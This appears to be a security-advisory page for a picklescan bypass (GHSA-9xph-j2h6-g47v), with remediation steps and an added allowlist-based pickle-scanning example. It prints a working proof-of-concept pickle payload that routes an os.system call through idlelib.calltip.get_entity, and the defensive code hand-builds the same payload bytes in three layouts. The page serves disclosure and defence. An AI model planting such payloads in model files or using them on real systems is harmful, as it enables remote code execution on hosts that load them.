GHSA-9xph-j2h6-g47v: picklescan: scanner bypass enables RCE via model files

GHSA-9xph-j2h6-g47v MEDIUM
Published August 26, 2025
CISO Take

picklescan < 0.0.29 fails to detect malicious pickle files that use Python's built-in idlelib.calltip.get_entity as an eval proxy, producing a false-negative scan result. Any pipeline that gates model loading on a picklescan pass is vulnerable to RCE from a file that clears the scan. Upgrade to picklescan 0.0.29 immediately and enforce defense-in-depth—never treat a single scanner pass as sufficient for untrusted model files.

Risk Assessment

High operational risk despite the 'medium' severity label. Exploitability is trivial post-disclosure (the PoC is five lines), and the impact is full RCE on the host that loads the file. The false-negative nature of the bug is what makes it dangerous: a clean scan gives defenders unwarranted confidence that the file is safe. Blast radius covers any MLOps workflow that uses picklescan as a security gate for pickle-format model files, a pattern widespread across ML engineering teams.

Affected Systems

Package      Ecosystem   Vulnerable Range   Patched
picklescan   pip         < 0.0.29           0.0.29


Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

4 steps
  1. Upgrade picklescan to 0.0.29 immediately across all environments.

  2. Audit existing model intake workflows: any system that autoloads pickled models after a picklescan pass without additional controls should be treated as potentially compromised if exposed to external model sources.

  3. Enforce defense-in-depth: migrate to the safetensors format for model storage where possible (it eliminates pickle deserialization entirely); load PyTorch checkpoints with torch.load(..., weights_only=True); run model loading in isolated containers with no network access.

  4. Detection: statically walk the pickle opcode stream (for example with pickletools.genops) and flag GLOBAL/STACK_GLOBAL references to idlelib.calltip or to any module not on an explicit allowlist; a denylist of known-dangerous callables is exactly what this bypass defeated, so an allowlist of the globals a checkpoint legitimately needs is the stronger check. At runtime, alert on unexpected subprocess, os.system, or eval calls originating from ML serving processes.
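The detection step above says to look at what the file itself would import rather than trusting a scanner verdict. The following Python, added here as an example and not code from picklescan or from the advisory, shows what that looks like end to end: it hand-assembles the advisory's proof-of-concept pickle as raw opcodes (so nothing is imported or executed while building it), walks the opcode stream with pickletools.genops to list every module.name the file would resolve via GLOBAL or STACK_GLOBAL (including the case where the module and name strings are fetched back out of the memo), and then loads the file only through an Unpickler that refuses any global not on an allowlist. The allowlist contents, the gate_model report format, the three PoC layouts and the benign checkpoint are assumptions made for this example.

```python
import io
import pickle
import pickletools
import struct

# Globals a loader may resolve. Hypothetical for this example; a real allowlist is
# derived from what the expected checkpoints actually need, nothing more.
DEFAULT_ALLOWLIST = frozenset({("collections", "OrderedDict"), ("builtins", "set")})

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
MEMO_PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}
MEMO_GET_OPS = {"GET", "BINGET", "LONG_BINGET"}


def extract_globals(data):
    """List every (module, name) the pickle would import, without executing it.
    GLOBAL carries "module name" inline; STACK_GLOBAL takes the two strings on top
    of the stack, which can arrive via string opcodes or memo lookups, so the memo
    is tracked too (a scanner that ignores the memo can be routed around)."""
    found, strings, memo, last = [], [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
            last = None
        elif op.name == "STACK_GLOBAL":
            if len(strings) < 2:
                raise ValueError("malformed pickle: STACK_GLOBAL without module/name")
            name, module = strings.pop(), strings.pop()
            found.append((module, name))
            last = None
        elif op.name in STRING_OPS:
            strings.append(arg)
            last = arg
        elif op.name == "MEMOIZE":
            memo[len(memo)] = last          # memo slots are numbered in MEMOIZE order
        elif op.name in MEMO_PUT_OPS:
            memo[arg] = last
        elif op.name in MEMO_GET_OPS:
            last = memo.get(arg)
            if isinstance(last, str):
                strings.append(last)
        else:
            last = None                     # some other object is now on top of the stack
    return found


class AllowlistUnpickler(pickle.Unpickler):
    """Fails closed: a global not on the allowlist aborts the load before REDUCE runs."""

    def __init__(self, file, allowlist):
        super().__init__(file)
        self.allowlist = allowlist

    def find_class(self, module, name):
        if (module, name) not in self.allowlist:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)


def load_allowlisted(data, allowlist=DEFAULT_ALLOWLIST):
    """Return (True, obj) or (False, reason); nothing off the allowlist is ever called."""
    try:
        return True, AllowlistUnpickler(io.BytesIO(data), allowlist).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)


def gate_model(data, allowlist=DEFAULT_ALLOWLIST):
    """Static scan first, then an allowlisted load; the file must pass both."""
    imported = extract_globals(data)
    disallowed = [g for g in imported if g not in allowlist]
    if disallowed:
        return {"ok": False, "globals": imported, "object": None,
                "reason": "static scan rejected globals %r" % disallowed}
    ok, result = load_allowlisted(data, allowlist)
    return {"ok": ok, "globals": imported, "object": result if ok else None,
            "reason": None if ok else result}


def build_poc_pickle(expression, layout="global"):
    """Hand-assemble the advisory's PoC as raw opcodes (constructed sample input;
    nothing is imported here, these bytes are simply what the attacker's file holds)."""
    module, name, expr = b"idlelib.calltip", b"get_entity", expression.encode()
    if layout == "global":                                # protocol 2 layout
        return (b"\x80\x02"                               # PROTO 2
                + b"c" + module + b"\n" + name + b"\n"    # GLOBAL module\nname\n
                + b"X" + struct.pack("<I", len(expr)) + expr   # BINUNICODE expr
                + b"\x85R.")                              # TUPLE1, REDUCE, STOP

    def short(s):                                         # SHORT_BINUNICODE s; MEMOIZE
        return b"\x8c" + bytes([len(s)]) + s + b"\x94"

    if layout == "stack_global":                          # protocol 4 layout
        return b"\x80\x04" + short(module) + short(name) + b"\x93" + short(expr) + b"\x85R."
    if layout == "memo":   # push and discard both strings, then re-fetch them via BINGET
        return (b"\x80\x04" + short(module) + short(name) + b"00"   # POP, POP
                + b"h\x00h\x01"                           # BINGET 0, BINGET 1
                + b"\x93" + short(expr) + b"\x85R.")      # STACK_GLOBAL, TUPLE1, REDUCE, STOP
    raise ValueError(layout)


# Constructed benign checkpoint: plain containers, no globals at all.
BENIGN_CHECKPOINT = pickle.dumps({"weights": [0.1, 0.2, 0.3], "epoch": 3}, protocol=4)

if __name__ == "__main__":
    for layout in ("global", "stack_global", "memo"):
        poc = build_poc_pickle("__import__('os').system('whoami')", layout)
        print(layout, gate_model(poc)["reason"])
    print("benign", gate_model(BENIGN_CHECKPOINT)["ok"])
```

The static walk and the allowlisting loader are deliberately independent: even if a future encoding trick slips past extract_globals, find_class still has to approve every module.name before REDUCE can call it, so the load fails closed instead of executing. The allowlist is what makes this robust; swapping it for a denylist would reproduce the weakness this advisory describes.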

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.1.2 - AI system risk assessment A.7.3 - Supplier and third-party relationships
NIST AI RMF
MANAGE 2.4 - Residual risks are managed and controlled
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-9xph-j2h6-g47v?

picklescan < 0.0.29 fails to detect malicious pickle files that use Python's built-in idlelib.calltip.get_entity as an eval proxy, producing a false-negative scan result. Any pipeline that gates model loading on a picklescan pass is vulnerable to RCE from a file that clears the scan. Upgrade to picklescan 0.0.29 immediately and enforce defense-in-depth—never treat a single scanner pass as sufficient for untrusted model files.

Is GHSA-9xph-j2h6-g47v actively exploited?

No confirmed active exploitation of GHSA-9xph-j2h6-g47v has been reported, but organizations should still patch proactively.

How to fix GHSA-9xph-j2h6-g47v?

1. Upgrade picklescan to 0.0.29 immediately across all environments.
2. Audit existing model intake workflows: any system that autoloads pickled models after a picklescan pass without additional controls should be treated as potentially compromised if exposed to external model sources.
3. Enforce defense-in-depth: migrate to the safetensors format for model storage where possible (it eliminates pickle deserialization entirely); load PyTorch checkpoints with torch.load(..., weights_only=True); run model loading in isolated containers with no network access.
4. Detection: statically walk the pickle opcode stream and flag GLOBAL/STACK_GLOBAL references to idlelib.calltip or to any module not on an explicit allowlist; at runtime, alert on unexpected subprocess, os.system, or eval calls originating from ML serving processes.

What systems are affected by GHSA-9xph-j2h6-g47v?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, MLOps pipelines, model registries.

What is the CVSS score for GHSA-9xph-j2h6-g47v?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

Using the idlelib.calltip.get_entity function, a built-in Python standard-library function, to execute code from a remote pickle file.

### Details

The attack payload executes in the following steps. First, the attacker crafts the payload by calling the idlelib.calltip.get_entity function in the __reduce__ method. Then the victim checks whether the pickle file is safe using the Picklescan library; because this library doesn't detect any dangerous functions, the victim decides to pickle.load() this malicious pickle file, which leads to remote code execution.

### PoC

```python
import pickle
from idlelib.calltip import get_entity


class EvilCalltipGetEntity:
    def __reduce__(self):
        # get_entity(expression) -> eval(expression)
        return get_entity, ("__import__('os').system('whoami')",)


# Serializing writes a GLOBAL reference to idlelib.calltip.get_entity plus its
# argument; nothing runs until a victim calls pickle.load() on the bytes.
payload = pickle.dumps(EvilCalltipGetEntity())
```

### Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded.

Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

### Corresponding

https://github.com/FredericDT
https://github.com/Qhaoduoyu

Exploitation Scenario

An attacker publishes a fine-tuned language or vision model to Hugging Face or a corporate model registry. The pickle stream inside the model file references idlelib.calltip.get_entity (emitted from a __reduce__ method when the attacker saved the object) with an embedded reverse shell expression as its argument; get_entity evaluates that string with eval(), and it swallows any exception the expression raises, so a failed payload leaves no traceback behind. The victim organization's automated MLOps pipeline downloads the model, runs picklescan (the file passes with no warnings), and loads it into the inference environment. The shell runs with the privileges of the ML serving process, yielding access to GPU nodes, production model weights, and internal network segments. The whole compromise chain is invisible to teams relying solely on picklescan.

Timeline

Published
August 26, 2025
Last Modified
August 26, 2025
First Seen
March 24, 2026
